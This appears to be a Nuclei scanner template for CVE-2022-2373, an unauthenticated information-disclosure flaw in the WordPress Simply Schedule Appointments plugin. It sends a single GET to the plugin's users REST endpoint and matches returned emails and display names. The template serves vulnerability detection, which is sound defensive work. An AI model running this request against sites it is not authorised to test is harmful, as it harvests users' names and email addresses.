id: CVE-2022-2373 info: name: WordPress Simply Schedule Appointments <1.5.7.7 - Information Disclosure author: theamanrawat,theabhinavgaur severity: medium description: | WordPress Simply Schedule Appointments plugin before 1.5.7.7 is susceptible to information disclosure. The plugin is missing authorization in a REST endpoint, which can allow an attacker to retrieve user details such as name and email address. reference: - https://wpscan.com/vulnerability/6aa9aa0d-b447-4584-a07e-b8a0d1b83a31 - https://wordpress.org/plugins/simply-schedule-appointments/ - https://nvd.nist.gov/vuln/detail/CVE-2022-2373 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N cvss-score: 5.3 cve-id: CVE-2022-2373 cwe-id: CWE-862 epss-score: 0.00482 cpe: cpe:2.3:a:nsqua:simply_schedule_appointments:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 verified: true framework: wordpress vendor: nsqua product: simply_schedule_appointments tags: simply-schedule-appointments,unauth,wpscan,cve,cve2022,wordpress,wp-plugin,wp http: - method: GET path: - "{{BaseURL}}/wp-json/ssa/v1/users" matchers-condition: and matchers: - type: word part: header words: - application/json - type: regex regex: - 'response_code":200' - '"email":"([a-zA-Z-_0-9@.]+)","display_name":"([a-zA-Z-_0-9@.]+)","gravatar_url":"http?:\\\/\\\/([a-z0-9A-Z.\\\/?=&@_-]+)"' condition: and - type: status status: - 200